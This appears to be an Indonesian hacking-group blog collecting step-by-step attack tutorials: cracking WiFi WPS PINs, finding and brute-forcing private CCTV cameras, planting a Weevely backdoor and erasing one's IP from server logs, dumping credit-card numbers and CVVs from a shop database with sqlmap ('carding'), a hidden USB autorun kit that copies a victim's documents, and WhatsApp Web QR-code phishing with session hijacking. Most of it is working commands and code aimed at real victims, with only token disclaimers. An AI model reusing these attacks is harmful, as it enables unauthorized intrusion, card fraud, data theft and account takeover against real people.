CYBER KEDIRI TEAM

BAHAGIA ITU SEDERHANA

CYBER KEDIRI TEAM

Lagu pula Unix-lah sistem operasi internet, Meski tentu bisa belajar menggunakan internet tanpa mengenal Unix, tapi anda tak akan mampu menjadi hacker internet tanpa mengenal Unix. Trust me, Use Unix, Unix Is Better..

CYBER KEDIRI TEAM

Learn Security | Learn Programming | Use Linux | Debugging Program | Write a Code | Share to your Community. ( I Think It's The Way Of Hacker ) .

CYBER KEDIRI TEAM

Befikirlah sebagai seorang pemula, maka dunia ini akan terbuka bagimu..

CYBER KEDIRI TEAM

Hacker tidak bersedia menghabiskan waktu dengan orang-orang yang hanya bersikap seperti hacker, tapi hacker memuja keahlian - terutama keahlian dalam dunia hacking dan sekuritas, juga keahlian dibidang apapun..

Tuesday, September 25, 2018

Love u

Wednesday, April 4, 2018

Cara Hack Wifi dengan Aplikasi Android 2018 (Reaver dan Bcmon)

Kali ini kita akan share pada Anda bagaimana cara hack wifi dengan android, hack wifi dengan aplikasi android melihat sandi/password wifi mudah tanpa resiko apapun. Keamanan WiFi dapat bervariasi seperti WPS, WPA, WPA2PSK dll. Banyak dari kita yang lelah mencoba beberapa trik hacking wifi palsu yang tersebar di internet tetapi di sini kami berbagi dengan Anda trik untuk meretas kata sandi wifi rooting maupun tanpa rooting Android yang sudah teruji berhasil 100%.

cara hack wifi dengan aplikasi Bcmon dan Reaver apk Android

Hacker tentunya menggunakan banyak alat tool aplikasi untuk meretas wifi, beberapa aplikasi hack wifi ini akan sangat berguna pastinya. Langsung saja tanpa basa basi lagi berikut tutorial tips trik bagaimana cara retas/hack password wifi menggunakan ponsel android.

Jenis-jenis keamanan WiFi Password Security?
Sebelumnya kami akan menjelaskan beberapa jenis keamanan pada sebuah wifi.

1. WEP
Keamanan Wi-Fi yang paling populer dan masih banyak digunakan di seluruh dunia. Tapi yang paling tidak aman juga. Anda dapat meretas password Wi-Fi dengan keamanan WEP dengan mudah menggunakan tool Aircrack dan Airmon dari Kali Linux.

2. WPA
WPA merupakan versi WEP yang ditingkatkan. Diluncurkan pada tahun 2003. Namun seorang peretas hacker Amerika menemukan beberapa kelemahan keamanan jaringan ini. Sehingga juga bisa dengan mudah diretas. Bahkan Anda dapat meretas Kata Sandi WiFi siapapun yang menggunakan keamanan WPA dari ponsel Android.

3. WPS
Yang terakhir WPS, satu-satunya akses Wi-Fi yang tidak mudah untuk diretas. Dalam beberapa kasus orang bisa melakukannya tetapi membutuhkan keterampilan peretasan yang tinggi. Jadi jika seseorang menggunakan keamanan jaringan WPA 2PSK maka akan sedikit lebih sulit untuk dihack.

Cara Hack Password Wifi menggunakan Ponsel Android

Langsung saja berikut tutorial cara hack wifi dengan aplikasi Bcmon dan Reaver apk Android.

Cara Hack Password Router Wifi WPA2 WPS dengan BCMON dan REAVER Apk Android

Cara Hack Password Wifi WPA2 WPS dengan BCMON dan REAVER Apk Android

1. Pertama, jika ponsel android Anda tidak di-root, cobalah untuk me-root-nya terlebih dahulu.

2. Lalu download dan instal Bcmon apk (Link download Ada Dibawah Artikel), penting karena agar dapat mengaktifkan mode monitor pada smartphone Anda yang mana akan membantu dalam proses PIN Cracking.

3. Setelah instalasi, jalankan aplikasi dan tap opsi "monitor mode".

4. Download dan Instal aplikasi Reaver apk (Link download Ada Dibawah Artikel) yang akan membantu dalam memecahkan kode Pin WPS, mengambil dan mencrack pin WPA2.

5. Setelah menginstal aplikasi reaver, jalankan dan tap konfirmasi pada layar, yang mengonfirmasi bahwa Anda tidak menggunakannya untuk tujuan ilegal, lalu ketuk APN atau titik akses WiFi yang ingin Anda hack dan tap lanjutkan. Sering kali, Anda mungkin perlu memverifikasi mode monitor untuk melanjutkan, dan ini akan menyebabkan bcmon terbuka lagi, maka tap saja ok untuk konfirmasi.

6. Buka pengaturan aplikasi dan pastikan Anda telah mencentang kotak Automatic Advanced settings.

7. Akhirnya sekarang, mulailah proses cracking dengan mengetuk tombol "Start Attack", pada tahap akhir ini, dibutuhkan waktu 10 menit sampai 1 jam lebih untuk memecahkan password WIFI WPS sampai berhasil.

Selamat mencoba dan sukses.
Terimakasih sudah membaca dan jangan lupa untuk membaca artikel cara trik hack wifi dengan android yang lain pada link yang sudah kami share diatas atau dibawah ini jika cara diatas masih belum mempan.

Link download:
BCMON APK

REAVER APK

Cara Hack Kamera CCTV Private Mudah 2018

Sekarang kamera CCTV digunakan dibanyak tempat seperti toko-toko, mal, kantor, gudang dan banyak lagi. Untuk alasan keamanan dan untuk berbagai tujuan lebih. Dan pada artikel kali ini kami membagikan bagaimana cara hack kamera CCTV Privat / Private CCTV Camera hacking. Banyak pencarian di Google tentang cara hack CCTV ini, namun kebanyakan hanya untuk meretas CCTV Pubik saja, di sini Anda akan menghack kamera CCTV pribadi atau Private CCTV.
Cara Hack Kamera CCTV Private Mudah 2018
Image via fbcdn.net
Langkah 1: Download Angry Ip Scanner
Angry Ip scanner termasuk ‘powerful GUI Port Scanner’ atau sangat ampuh dalam hal port scanning. Angry Ip Scanner tersedia untuk semua OS (Operasi Sistem).
Angry ip scanner hack camera CCTV
Langkah 2: Tentukan Rentang Alamat Ip / Ip Range
Penting bahwa bagaimana memilih rentang alamat ip yang tepat untuk meretas kamera CCTV. kamera CCTV yang terhubung dengan koneksi internet broadband. Jika Anda menggunakan akses router broadband kemudian temukan alamat ip publik Anda. Cukup ketik 'My IP' di Google atau Bing search bar. Google akan menampilkan alamat ip publik Anda.
GOOGLE bing menemukan ip
Berikut 77.247.181.165 adalah ip publik saya. Jadi rentang ip bisa jadi 77.247.181.1 - 77.247.181.255 atau 77.247.181.1 - 77.247.185.255
Langkah 3: Konfigurasi Angry Ip scanner untuk peretasan kamera CCTV
Buka Angry Ip Scanner
Pilih menu tools> Preferences> Ports | tambahkan port 80,8080,23.
Maka Port 80,8080 dan 23 ini yang akan di scan nantinya.
PORT Angry ip scanner hack camera CCTV
Kita perlu menambahkan fitur Web Detect. Web detect dapat menampilkan rincian singkat tentang rincian perangkat yang terhubung ke internet. seperti  berikut
      
      CCTV camera model name
-          CCTV camera name
-          Router name atau router model name
Untuk menambahkan web detect ikuti langkah berikut
Pilih menu Tools> Fetchers> add (<<) web detect
WEB DETECT Angry ip scanner hack camera CCTV
klik OK
Langkah 4: Scanning Rentang Ip / Ip range scanning
Masukkan rentang ip di tab Ip Range dan klik start
IP RANGE Angry ip scanner hack camera CCTV
Image via fbcdn.net
Setelah proses scanning selesai Anda akan menemukan informasi pada tab web detect misal seperti contoh sebagai berikut


- RomPager / 4.07 UPnP / 1.0 ----- router
- uc-httpd 1.0.0 ----- CCTV camera
- DVRDVS-Webs ----- CCTV camera
- microhttpd ----- router
- Jaring ----- CCTV camera
- Hikvision-Webs ----- CCTV camera
- iBall-Baton ----- CCTV camera


Copy alamat Ip kamera CCTV yang terdeteksi dan paste pada address bar browser lalu klik enter.
Langkah 5: Login dengan Username dan Password Default
Sebagian besar kamera CCTV dan router untuk username dan password dikonfigurasi secara default. contoh
Username: admin | password: admin
Username: admin | password: (password kosong)
Username: admin | password: 12345
Username: admin | password: 9999
Anda juga dapat mencari di google untuk username dan password default dari kamera CCTV.
beberapa kamera CCTV membutuhkan Plugin agar dapat tampil, Anda dapat men-downloadnya dari halaman tersebut. Jika pada halaman tersebut tidak ditemukan plugin maka buka situs yang menyediakan plugin tersebut lalu download.
Langkah 6: Crack password kamera CCTV Menggunakan Hydra
Jika dengan password default tidak berhasil maka perlu untuk melakukang crack/ hack/ peretasan. Hydra adalah tool brute force terbaik yang mampu untuk meng hack password kamera CCTV ini.
Sekarang jalankan Kali ( Kali Linux) anda, buka terminal dan ketik..
root@DeepHack:~# hydra -s 80 l admin -P /root/Desktop/wl/cctvpass.txt -e ns -t 16 targetIP http*
HYDRA hack camera CCTV
sintaks Hydra
-s 80 -- menentukan nomor port
-l admin - nama default login admin
-P /root/desktop/worldlist.txt - Pilih daftar kata Anda untuk brute force
-e --- password kosong
ns --- mencoba login dengan password dan tanpa password
http --- nama port untuk di attack
Cara ini dapat men-hack password dan username kamera CCTV.
Penting!!! Artikel ini hanya untuk tujuan pendidikan. Tujuan dari artikel ini adalah bahwa bagaimana agar kita mengamankan kamera cctv menggunakan password yang sangat kuat dan rumit. Jangan digunakan untuk kejahatan.
Terimakasih sudah berkunjung, silahkan untuk di like, share artikel ini, atau ingin bertanya-tanya, pendapat, saran, berkomentarlah pada kolom komentar dibawah.

Cara Backdoor dan Deface Web Server Menggunakan Weevely

Weevely merupakan sebuah Webshell Management Tool yang ditulis menggunkakan bahasa pemrograman Phyton. Weevely hanya ini tersedia untuk sistem operasi Linux.

Bagaimana cara melakukan Backdoor dan Deface Web Server Menggunakan Weevely?

Langsung saja ke langkah-langkahnya.

Instalasi
root@ddos:~# pip install prettytable Mako PyYAML python-dateutil PySocks –upgrade
root@ddos:~# apt-get install g++ python-pip libyaml-dev python-dev

Cara menjalankan Weevely

Backdoor dan Deface Web Server Menggunakan Weevely


Membuat sebuah Backdoor
root@ddos:~# weevely generate ddos ddos.php 
*bd core ddos.php modules utils weevely.py


Koneksikan ke Backdoor

root@ddos:/usr/share/weevely# weevely http://192.168.1.8/ddos.php ddos
Backdoor dan Deface Web Server Menggunakan Weevely


Bypass Policy to Read /etc/passwd
www-data@ddos:/etc $ audit_etcpasswd
Backdoor dan Deface Web Server Menggunakan Weevely


Menebak Credential SQL user
Langkah ini merupakan cara menebak kredensial dari beberapa pengguna SQL.
weevely> bruteforce_sql –help
Backdoor dan Deface Web Server Menggunakan Weevely


Pembersihan log
Trik ini untuk adalah cara membersihkan catatan log pada server.

Backdoor dan Deface Web Server Menggunakan Weevely


Disini kita gunakan command system_info untuk mendapatkan Ip yang kita gunakan
www-data@ddos:/var/log $ system_info -info client_ip

Kita gunakan grep command untuk mengkonfirm bahwa Ip yang telah kita dapatkan berada dalam file Log
www-data@ddos:/var/log/apache2 $ cat ‘/var/log/apache2/access.log.1’ |grep “192.168.1.8”
Backdoor dan Deface Web Server Menggunakan Weevely

Kita akan melihat bahwa aktifitas Ip kita telah terecord atau terekam pada Log.
Disini kita akan menggunakan perintah Grep untuk menghapus Ip lalu menyimpannya ke file sementara / temporary file.
www-data@ddos:/var/log/apache2 $ cat ‘/var/log/apache2/access.log.1’ |grep -v “192.168.1.8” > cleaned.log

Silahkan uji apakah Ip telah berhasil kita hapus
www-data@ddos:/var/log/apache2 $ cat ‘/var/log/apache2/access.log.1’ |grep -v “192.168.1.8” > cleaned.log
www-data@ddos:/var/log/apache2 $ cat cleaned.log |grep “192.168.1.8”
www-data@ddos:/var/log/apache2 $ 

Lalu kita ganti file cleaned.log dengan access.log.1
www-data@ddos:/var/log/apache2 $ rm access.log.1
www-data@ddos:/var/log/apache2 $ mv cleaned.log access.log.1

Sunday, October 15, 2017

CARDING WITH SQLMAP 2017

AssalamualaikumWr.Wb oke kembali lagi bersama saya. saya disini ada sedikit ilmu tentang Tutorial Carding ( menggunakan sqlmap ) - Sore ini saya membuat tutorial karena teman oke langsung saja ke tkp

Pertama kita siapkan tools" nya dahulu :
1. sqlmap
2. dork carding ( bisa cari di google ) / download
3. sqli scanner :


Pertama ,ambil dork lalu scan menggunakan sqli scanner :


Setelah itu kita test URL target dengan memberi kan tanda petik di depan "="
http://www.zite.com/merchandise/index.php?cat=268
menjadi :
http://www.zite.com/merchandise/index.php?cat='268
Nah, web tersebut error saat kita inject ,


Kedua, kita eksekusi menggunakan sqlmap :
berikut perintahnya : ./sqlmap.py -u link --dbs
Disini kita mendapatkan 3 database :


[*] balboast_gkgbu
[*] balboast_gkgcart
[*] information_schema
Setelah itu kita dump database nya untuk mencari table ,
gunakan perintah : ./sqlmap.py -u link -D namadatabase --tables ( disini saya coba database "balboast_gkgcart" )


nah, saya dapat tables nya :

Database: balboast_gkgcart                                                                                                                                                                     
[88 tables]
+-----------------------+
| amanu                 |
| categories            |
| clients               |
| components            |
| config                |
| config_groups         |
| customers             |
| form_data             |
| form_fields           |
| forms                 |
| geo                   |
| groups                |
| item_amanu            |
| item_cat              |
| item_files            |
| item_files_customer   |
| item_options          |
| item_options_linked   |
| item_options_values   |
| item_related          |
| item_thread           |
| item_thread_old       |
| items                 |
| items_addphoto        |
| items_item_files      |
| items_packages        |
| languages             |
| logs                  |
| mailinglist           |
| mailinglist_cat       |
| mailinglist_members   |
| manu                  |
| news                  |
| news_cat              |
| news_news_cat         |
| orders                |
| photos                |
| photos_cat            |
| pic_gallery           |
| ship_prices           |
| ship_zones            |
| sites                 |
| sites_components      |
| thread                |
| thread_gel            |
| thread_items          |
| ups                   |
| ups_packaging         |
| ups_pickup            |
| ups_service           |
| ups_units             |
| users                 |
| users_access          |
| users_groups          |
| users_spu             |
| users_spu_values      |
| zones                 |
+-----------------------+
[09:47:41] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/balboastitch.com'

Kita pilih di bagian "orders" . Kita ambil columns nya .
Gunakan perintah : sqlmap.py -u link -D namadatabase -T namatable --columns

Maka akan muncul seperti ini :


Table: orders
[18 columns]
+-----------------+-------------+
| Column          | Type        |
+-----------------+-------------+
| cart_id         | varchar(15) |
| cc_ex_month     | tinyint(4)  |
| cc_ex_year      | int(11)     |
| cc_number       | varchar(30) |
| cc_type         | varchar(20) |
| customer_id     | int(11)     |
| cvv2            | varchar(20) |
| date            | datetime    |
| id              | int(11)     |
| ipaddress       | varchar(25) |
| payment_method  | varchar(15) |
| shipping        | float(8,2)  |
| shipping_method | varchar(5)  |
| status          | tinyint(4)  |
| subtotal        | float(8,2)  |
| tax             | float(8,2)  |
| text            | text        |
| total           | float(8,2)  |
+-----------------+-------------+
Nah :D sudah muncul, selesai sudah..tinggal kita dump 1 per 1 columnsnya bro :)
Caranya : ./sqlmap.py -u link -D namadatabase -T namatable --dump

contoh : ./sqlmap.py -u link -D namadatabase -T namatable -C cc_number --dump

maka nanti cc number akan muncul walau proses agak lama .


SEKIAN DAN TERIMA KASIH 
Gunakan Dengan Bijak
JSLinux

Tuesday, October 10, 2017

PRO HACKING : CARA MENCURI DATA DENGAN FLASHDISK

lama gw kagak posting sahabat cyber kediri ....
karna gw habis sidang scriptsi bukan script deface ya ;v
kali ini gw akan ajar kan cara hack satelite ;v
eh maksut saya curi data dengan flasdik murahan  
langsung saja gk usah basa basi

Langkah ke-1
Buka Notepad copy dan paste kode dibawah ini.
[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat
Kemudian simpanlah di flashdisk dengan nama: autorun.inf
Langkah ke-2
Buka Notepad lagi dan copas kode berikut:
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\My Documents\*.doc" "%drive%\all\doc"
@echo off
cls
Simpan di flashdisk anda dengan nama:file.bat
Langkah ke-3
Buka Notepad lagi dan copas kode berikut:
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
Simpan di flashdisk anda dengan nama:invisible.vbs
Langkah ke-4
Buka Notepad lagi dan copas lagi kode berikut:
wscript.exe \invisible.vbs file.bat
Simpan di flashdisk anda dengan nama:launch.bat
Ok, sekarang pastikan ke-4 file tadi yang telah kita buat berada di flashdisk kita, dan buatlah folder baru dengan nama all untuk menyimpan hasil curian kita di komputer teman tadi, dimana perintah: %backupcmd% “%USERPROFILE%\My Documents\*.doc” “%drive%\all\doc”, akan menyalin semua file ber-ekstensi .doc kedalam folder “all/doc” yang berada di flashdisk kita secara otomatis waktu kita mencolokkan flashdisk kita dikomputernya, ataupun dia sendiri yang mencolokkannya dikomputernya sendiri.

Sebelum mencoba mencuri file dikomputer teman, coba dulu flashdisk kita dikomputer kita sendiri, lihat apakah bekerja dengan baik. Selamat mencoba

Monday, September 25, 2017

Cara Hack QR Code Of "Whatsapp Web" Menggunakan Phishing Teknik Dalam Kali Linux 2017



Whatsapp adalah salah satu aplikasi messaging yang paling populer yang tersedia untuk hampir semua sistem operasi seperti windows, android, mac, blackberry dll ...

Untuk memberikan akses whatsapp pada browser, meluncurkan web whatsapp, dijamin dan dilindungi dengan Akhir Untuk Akhir Encryption . Ada banyak tentang alat dan aplikasi yang tersedia di pasar yang mengklaim akun whatsapp hack, pesan whatsapp hack, mata-mata whatsapp menggunakan alat hack whatsapp tapi semua aplikasi ini palsu dan tidak bekerja sama sekali. Mawalu dikembangkan dan uploded alat pada github yang memungkinkan dia untuk mengkloning QR Code of web whatsapp, digunakan untuk hack akun pengguna web whatsapp.

Yang Kita Butuhkan
  • Kali Linux 2.0

  • Firefox Browser
  • Server Standalone Selenium
  • Halaman Phishing (halaman Web phishing Whatsapp)
Hack Whatsapp web menggunakan teknik phishing di Kali linux 2.0
  • Update Kali linux 2.0 menggunakan perintah di bawah ini
apt-get Update

  •  Sekarang Download dan install browser Firefox
apt-get install firefox Xvfb

wget http://selenium-release.storage.googleapis.com/2.43/selenium-server-standalone-2.43.1.jar

  •  Setelah menginstal firefox dan selenium, jalankan perintah di bawah ini di terminal
java -jar selenium-server.jar

  •  Sekarang buka terminal dan clone whatsapp halaman phishing baru dari github
git clone https://github.com/Mawalu/whatsapp-phishing.git

  •  Sekarang mengubah direktori ke WhatsApp halaman phishing
cd whatsapp-phishing

  •  Sekarang instal node dan menjalankan file index.js
npm install node index.js

  •  Setelah mengeksekusi file index.js, buka browser dan ketik 127.0.0.1 ke url baru
  • Pindah ke web whatsapp di smartphone Anda dengan pergi ke Menu> Whatsapp Web dan memindai QR code dari browser Anda
  • Setelah memindai kode QR, file baru akan menciptakan dalam direktori yang sama dengan pengguna details.Copy data dari rahasia baru dibuat mengajukan
  • Saatnya untuk Buka web.whatsapp.com kemudian Buka konsol pengembang Anda dan masukkan rincian berikut
> var t = CONTENT_OF_YOUR_SECRETS_FILE
> function login(token) {Object.keys(token.s).forEach(function (key) {localStorage.setItem(key, token.s[key])}); token.c = token.c.split(';'); token.c.forEach(function(cookie) {document.cookie = cookie; });} > login(t)

  • Reload Halaman
 Anda harus login sebagai orang yang dipindai kode QR

Program ini menggunakan node.js dan socket.io untuk website dan selenium, alat yang digunakan untuk browser scripting, untuk berkomunikasi dengan klien web Whatsapp. Program ini dimulai dengan http dan server socket.io. Jika klien baru terhubung ke socket.io aplikasi akan membuat permintaan untuk contoh selenium untuk memulai browser baru dan terhubung ke web.whatsapp.com.  Itu akan mengambil dan Ekstrak QR code dari Web WhatsApp dan posting ke klien melalui WebSocket yang  script sisi klien kemudian menunjukkan QR code bagi pengguna dan jika korban memindai QR code maka browser selenium dikendalikan mengirim kunci rahasia untuk penyerang kemudian penyerang mengambil data, dan menyimpannya ke file teks